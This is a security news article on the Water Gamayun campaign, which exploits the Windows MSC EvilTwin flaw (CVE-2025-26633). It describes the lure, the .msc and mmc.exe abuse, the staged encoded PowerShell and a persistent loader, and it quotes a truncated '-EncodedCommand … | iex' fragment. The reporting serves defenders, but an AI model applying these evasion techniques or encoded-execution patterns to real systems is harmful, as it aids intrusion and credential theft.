Persistent threat group Water Gamayun has intensified its cyberattacks, exploiting a newly identified vulnerability, CVE-2025-26633, dubbed MSC EvilTwin, in Windows systems. This malware campaign targets enterprise and government organizations, employing multi-stage attacks to pilfer sensitive information, steal credentials, and establish long-term network access. The emerging attacks, first observed in 2025, blend sophisticated techniques, including the abuse of trusted binaries and deep obfuscation, to circumvent modern security measures.
The attack chain commences with a user’s web search leading to a compromised website. This site then redirects the victim to a deceptive lookalike domain, where a malicious RAR file, masquerading as “hiringassistant.pdf.rar,” is delivered. Upon opening this file, the embedded payload exploits the MSC EvilTwin vulnerability. It accomplishes this by dropping a specially crafted .msc file, which is subsequently loaded by the legitimate mmc.exe process. This process then triggers hidden PowerShell commands through the misuse of TaskPad snap-in functionalities, according to Zscaler security analysts.
The campaign is distinguished by its multi-stage attack methodology and sophisticated evasion tactics designed to elude both users and automated detection tools. Zscaler researchers have attributed this campaign to Water Gamayun, citing several key indicators. These include the rare abuse of the EvilTwin vulnerability, custom PowerShell obfuscation techniques, and the deployment of decoy recruitment documents to reduce user suspicion.
Water Gamayun Exploits MSC EvilTwin Vulnerability for Malicious Code Injection
The detailed analysis by the Zscaler research team reveals the intricate workings of the Water Gamayun attack. Once an initial foothold is established, the malware chain orchestrates a series of actions, including the download of executables, extraction of archives, and process injection, all aimed at expanding its reach within the targeted network. This coordinated effort highlights the evolving sophistication of advanced persistent threats (APTs).
Multi-Stage Payload and Hidden Execution
At the core of Water Gamayun’s operational strategy lies a meticulously layered infection process. Following the user’s interaction with the disguised RAR file, the payload proceeds to write a malicious .msc file onto the disk. When this file is executed, the mmc.exe utility interprets the embedded malicious snap-in data. This interpretation leads to the execution of encoded PowerShell commands.
The initial stage of the PowerShell script is responsible for downloading legitimate utilities, such as UnRAR.exe, which is then used to access password-protected archives containing further payloads. These scripts employ encoded commands, exemplified by structures like “-EncodedCommand JABX… | iex,” to obscure their true purpose.
A subsequent second-stage script takes over, compiling a .NET module. This module is crucial for its ability to hide malware windows from the user’s view. It also initiates the display of a decoy PDF file, to further mislead the victim, and deploys the final loader executable, named ItunesC.exe. This loader is designed to ensure long-term persistence within the compromised system. It achieves this by launching multiple instances of itself and concealing network communication beacons directed towards external IP addresses.
This campaign underscores the effectiveness of advanced obfuscation techniques and multi-phase execution in evading current security defenses. Consequently, it becomes imperative for cybersecurity defenders to diligently monitor for unusual file extensions, the pervasive use of encoded PowerShell, suspicious process execution chains, and anomalous network activity pointing to similar infrastructure. The ability of threat actors like Water Gamayun to leverage lesser-known vulnerabilities, such as the MSC EvilTwin flaw, indicates a need for continuous adaptation in defensive strategies.
Looking ahead, organizations must anticipate that Water Gamayun and similar APT groups will continue to refine their tactics, potentially discovering and exploiting new vulnerabilities. The ongoing analysis of their methodology, including the specific indicators of compromise identified by Zscaler, will be crucial for developing robust and proactive defenses. The cybersecurity community will be watching closely for any further evolution in their attack vectors and the implementation of countermeasures by affected entities.